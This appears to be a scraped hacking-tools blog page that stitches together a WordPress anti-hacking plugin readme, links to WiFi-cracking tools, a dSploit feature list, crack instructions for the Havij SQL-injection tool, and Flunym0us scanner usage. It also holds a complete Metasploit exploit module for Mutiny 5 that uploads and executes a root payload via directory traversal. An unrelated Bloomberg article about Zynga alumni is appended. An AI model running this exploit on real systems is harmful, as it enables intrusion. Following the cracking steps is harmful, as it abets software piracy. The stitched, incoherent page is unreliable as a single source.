WP-Plugin Anti Hacking

 =================================Anti Hacking Tools================================= Plugin Name: Anti Hacking Tools Author : Jasman (jasman[at]ihsana.com) Copyright (C) 2012 Ihsana IT Solution, Inc. All rights reserved. Plugin URI: http://pasbar.com/page/dinamic/id/21/wordpress-plugin-anti-hacking-tools.asp Description: Protect your blog from hacking tools, ircbot (botnet) and fake browser. Requires at least: 3.0 Tested up to: 3.4 =================================Description================================= Too difficult to protect the site from botnets. googlebot, ybot, crawler bot is a botnet. RSS, feedback tool uses the same technique with a botnet. irc bot, bot scanner or a hacking tool that is also botnet. but has a different purpose. IRC bot, Bot scanner or a hacking tool is very disturbing, and its presence does not benefit us. from here the idea of making this Plugins. if the medium and high risk tool will implement the web status refused. and if a low risk web status can only be read to apply, can not upload or comment. Database on the plugin is taken from an existing tool. I hope this tool is useful for security and do not interfere with your SEO. ================================= Installation ================================= Download Installation: 1. Download the anti-haxtool.zip file to your computer and unzip it. 4. Upload the anti-haxtool folder (including all files within) to your /wp-content/plugins/anti-haxtool. 5. Activate plugin. 6. Enjoy! ================================= Upgrade Notice =============================== You can see on Administration Control Panel or regular visit http://pasbar.com/page/dinamic/id/21/wordpress-plugin-anti-hacking-tools.asp ================================== Screenshots =============================== 1. Administration Control Panel 2. Test using IRC Botnet 3. Test using a hacking tool 4. Test using fake browser php and perl scripts =================================== Help Info =================================== Report Bug : http://pasbar.com/page/dinamic/id/21/wordpress-plugin-anti-hacking-tools.asp Vendor : http://ihsana.com/ 


Download:
Last Update v.1.01 lgsung ke wp aja:
http://wordpress.org/extend/plugins/anti-hacking-tools/

Source:Here

CommView And AirCrack For WPA

CommView for WiFi – http://www.tamos.com/download/main/ca.php


Aircrack-ng Windows GUI – http://sourceforge.net/projects/aircrack-ngwind/

dSploit - Android network analysis

download
Introducing dSploit
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc . This application is still in beta stage, a stable release will be available as soon as possible, but expect some crash or strange behaviour until then, in any case, feel free to submit an issue on GitHub.

Why?
You might ask why there’s the need of another tool like zAnti, NetSpoofer, DroidSheep, FaceNiff, etc.

Don’t get me wrong, i have nothing against proprietary software, i’ve been in contact with zAnti staff for a while now, i think they’re a really great and open minded team, but closed source is closed source, there’s no community contribution and most of all, you have to pay for it. Secondly, every tool i’ve found was very specific, none of them had every feature i needed so most of the times i had to use three or four tools at a time, which is kinda frustrating.

Therefore, dSploit was born, only one ( open source ) tool to rule them all!

WiFi Cracking
The WiFi scanner will show in green access points with known default key generation algorithms, clicking on them allows you to easily crack the key, supported models: Thomson, DLink, Pirelli Discus, Eircom, Verizon FiOS, Alice AGPF, FASTWEB Pirelli and Telsey, Huawei, Wlan_XXXX, Jazztel_XXXX, Wlan_XX, Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX, WifiXXXXXX, Sky V1, Clubinternet.box v1 and v2, InfostradaWifi.

RouterPWN
Launch the http://routerpwn.com/ service to pwn your router.

Trace
Perform a traceroute on target.

Port Scanner
A syn port scanner to find quickly open ports on a single target.

Inspector
Performs target operating system and services deep detection, slower than syn port scanner but more
accurate.

Vulnerability Finder
Search for known vulnerabilities for target running services upon National Vulnerability Database.

Login Cracker
A very fast network logon cracker which supports many different services.

Packet Forger
Craft and send a custom TCP or UDP packet to the target, such as Wake On LAN packets.

MITM
A set of man-in-the-midtle tools to command&conquer the whole network.

Simple Sniff
Redirect target’s traffic through this device and show some stats while dumping it to a pcap file.

Password Sniffer
Sniff passwords of many protocols such as http, ftp, imap, imaps, irc, msn, etc from the target.

Session Hijacker
Listen for cookies on the network and hijack sessions.

Kill Connections
Kill connections preventing the target to reach any website or server.

Redirect
Redirect all the http traffic to another address.

Replace Images
Replace all images on webpages with the specified one.

Replace Videos
Replace all youtube videos on webpages with the specified one.

Script Injection
Inject a javascript in every visited webpage.

Custom Filter
Replace custom text on webpages with the specified one.

Well, first of all, the only software which is comparable to dSploit in terms of features and support is zAnti ( refer to the following comparison table ), which is a proprietary tool and obviously closed source.

Havij 1,17 Pro Automatic Sql Injection Tool

 
  
Download  

  

How To Crack :
[+] Install Havij 1.17 Pro.exe

[+] ekstrack file loader.exe To folder C:\Program Files\ITSecTeam\Havij Pro

[+]Run Loader.exe ( Run As Administrator If Needed )

[+] If Havij And Loader Run Click Register At Havij Menu

Fix And Patched
Dump all. New bypass method for MySQL using parenthesis. Write file feature added for MSSQL and MySQL. Loading HTML form inputs. Saving data in CSV format. Advanced evasion tab in the settings. Injection tab in settings. Non-existent injection value’ can now be changed by *user (the default value is 999999.9). Comment mark’ can be changed by user (the default value is –). Disabling/enabling of logging. Bugfix: adding manual database in tables tree view. Bugfix: finding string columns in PostgreSQL. Bugfix: MS Access blind string type data extraction Bugfix: MSSQL blind auto detection when error-based method fails Bugfix: all database blind methods fail on retry Bugfix: guessing columns/tables in MySQL time-based injection Bugfix: crashing when dumping into file Bugfix: loading project injection type (Integer or String) Bugfix: HTTPS multi-threading bug Bugfix: command execution in MSSQL 20

Source By XCode

Flunym0us is a Vulnerability Scanner for Wordpress and Moodle.

Introduction

Flunym0us is a Vulnerability Scanner for Wordpress and Moodle designed by Flu Project Team.
Flunym0us has been developed in Python. Flunym0us performs dictionary attacks against Web sites. By default, Flunym0us includes a dictionary for Wordpress and other for Moodle.

Downloads

You can download the code from here (downloads tab): http://code.google.com/p/flunym0us/downloads/list
Moreover, Flunym0us is incluided in Bug-traq (Linux distribution of Audit): http://bugtraq-team.com/ (Old version)

Operation

Flunym0us requires python.
Arguments allowed:

-h, --help: Show this help message and exit

-wp, --wordpress: Scan WordPress site

-mo, --moodle: Scan Moodle site

-H HOST, --host HOST: Website to be scanned

-w WORDLIST, --wordlist WORDLIST: Path to the wordlist to use

-t TIMEOUT, --timeout TIMEOUT: Connection timeout

-r RETRIES, --retries RETRIES: Connection retries

-p PROCESS, --process PROCESS: Number of process to use

-T THREADS, --threads THREADS: Number of threads (per process) to use

Example

Versions

Flunym0us is distributed under the terms of GPLv3 license
ChangeLog 1.0:

[+] Search Wordpress Plugins

[+] Search Moodle Extensions

ChangeLog 2.0:

[+] http user-agent hijacking

[+] http referer hijacking

[+] Search Wordpress Version

[+] Search Wordpress Latest Version

[+] Search Version of Wordpress Plugins

[+] Search Latest Version of Wordpress Plugins

[+] Search Path Disclosure Vulnerabilities

[+] Search Wordpress Authors

ChangeLog 2.1:

[+] Python's setuptools features has been added for the installation

Authors

- Juan Antonio Calles (@jantonioCalles)
- Pablo Gonzalez (@fluproject)
- Chema Garcia (@sch3m4)
- German Sanchez (@enelpc)

Mutiny 5 Arbitrary File Upload

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Mutiny 5 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in the Mutiny 5 appliance. The EditDocument servlet provides a file upload function to authenticated users. A directory traversal vulnerability in the same functionality allows for arbitrary file upload, which results in arbitrary code execution with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance. }, 'Author' => [ 'juan vazquez' # Metasploit module and initial discovery ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0136' ], [ 'US-CERT-VU', '701572' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ] ], 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Mutiny 5.0-1.07 Appliance (Linux)', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2013')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Path to Mutiny Web Service', '/']), OptString.new('USERNAME', [ true, 'The user to authenticate as', 'superadmin@mutiny.com' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'password' ]) ], self.class) end def upload_file(location, filename, contents) post_data = Rex::MIME::Message.new post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{filename}\"") post_data.add_part("../../../..#{location}", nil, nil, "form-data; name=\"uploadPath\"") # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "interface","EditDocument"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "JSESSIONID=#{@session}" }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ return true else return false end end def login res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "interface", "index.do"), 'method' => 'GET' }) if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ first_session = $1 end res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "interface", "j_security_check"), 'method' => 'POST', 'cookie' => "JSESSIONID=#{first_session}", 'vars_post' => { 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'] } }) if res.nil? or res.code != 302 or res.headers['Location'] !~ /interface\/index.do/ return false end res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "interface", "index.do"), 'method' => 'GET', 'cookie' => "JSESSIONID=#{first_session}" }) if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ @session = $1 return true end return false end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "interface", "/"), }) if res and res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/ version = $1 end if version and version >= "5" and version <= "5.0-1.07" return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Trying to login") if login print_good("#{@peer} - Login successful") else fail_with(Exploit::Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options") end exploit_native end def exploit_native print_status("#{@peer} - Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" if upload_file(elf_location, elf_filename, elf) register_files_for_cleanup("#{elf_location}/#{elf_filename}") f = ::File.open("/tmp/test.elf", "wb") f.write(elf) f.close else fail_with(Exploit::Failure::Unknown, "#{@peer} - Payload upload failed") end print_status("#{@peer} - Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" if upload_file(jsp_location, jsp_filename, jsp) register_files_for_cleanup("#{jsp_location}/#{jsp_filename}") else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed") end print_status("#{@peer} - Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), 'method' => 'GET' }) end def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|try {\n| jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end 

Exploit From http://www.exploit-db.com

Zynga Alums Launch Game Startups to Battle Zynga

One mile north of Zynga’s (ZNGA) shopping mall-size headquarters in San Francisco, a dozen employees at JuiceBox Games crowd into a single-room office with one window and Ikea desks. They’re building a smartphone card-collecting game called HonorBound, which will compete with Zynga’s War of the Fallen and similar mobile offerings when JuiceBox launches it this summer. While the company has a fraction of the team and budget typically required for such a project, its three founders worked together at Zynga before striking out on their own last year. “We’re able to take risks that other companies may not be interested in taking,” says JuiceBox Chief Executive Officer Michael Martinez.

While Zynga struggles to reinvent itself as a mobile game maker, it’s encountering growing competition from former employees. Frustrated by the publicly traded company’s 3,000-employee bureaucracy—not to mention shrinking sales and a falling stock price—many of its top product managers have left for startups. “To be reminded what it’s like to create something as fast as you can and work with a small team of people you adore and trust—there’s nothing like that,” says Mike Verdu, Zynga’s former chief creative officer. A veteran PC game developer who joined Zynga in 2009, Verdu last month unveiled his company, TapZen, which combines Zynga’s free online model with games tailored for tablets.

Besides JuiceBox and TapZen, at least four other game startups have been created by Zynga defectors since the company’s initial public offering in December 2011. Last year former Zynga engineering director Amitt Mahajan, one of the architects of megahit FarmVille, founded Red Hot Labs, which has attracted $1.5 million from venture capital firms including Andreessen Horowitz. (Bloomberg LP, parent company of Bloomberg Businessweek, is an investor in Andreessen Horowitz.) Bee Cave Games, headed by former Zynga general manager Erik Bethke, is pushing Blackjack Casino. Bret Terrill, a former Zynga M&A manager, founded 12 Gigs, which makes Slots Heaven. Paul Bettner, who sold startup Newtoy to Zynga in 2010, plans to develop games for Ouya, a $99 console that runs on the Android operating system.

Zynga CEO Mark Pincus’s emphasis on empowering young executives to act as if they’re running a venture or game studio may have contributed to the diaspora. “One of the greatest measures of the success of our company is the progression of our people as leaders,” says Colleen McCreary, Zynga’s human resources head. “We encourage people to pursue their passions, regardless of where it takes them.” Zynga’s financial difficulties have hurt its focus on developing innovative games by tightening the reins on designers, says former chief game designer Brian Reynolds, who left earlier this year. “It’s hard to go experiment and not have somebody always ask you when will you be done,” he says.

Red Hot’s Mahajan helped start the Red Dog Group, a collection of former Zynga executives who hold Skype (MSFT) chats and meet about once a month to talk shop. The group, whose name is a nod to Zynga’s logo, shares tips on how to raise money from investors and how to improve mobile-user experience. “We’ve all come out of this really strong with the ability to run some companies,” says Roger Dickey, the creator of Zynga hit Mafia Wars, who left the company in 2011 to invest in startups. Zynga managers received training on how to use data analysis to build viral hits and take in more money from virtual goods, he says.

As TapZen’s Verdu builds his own games from scratch, he wishes he had the large computer systems Zynga provided him to run games through analytical tests. “I crave their access to analytics,” he says. “I do miss having all that infrastructure that makes life easy.” His former employer has given him another leg up, though: $10 million in seed money. In return, TapZen will let Zynga “take advantage of any breakthrough we make,” Verdu says.

The bottom line: Zynga managers are taking the company’s strategies, and sometimes its money, as they leave to launch their own game startups.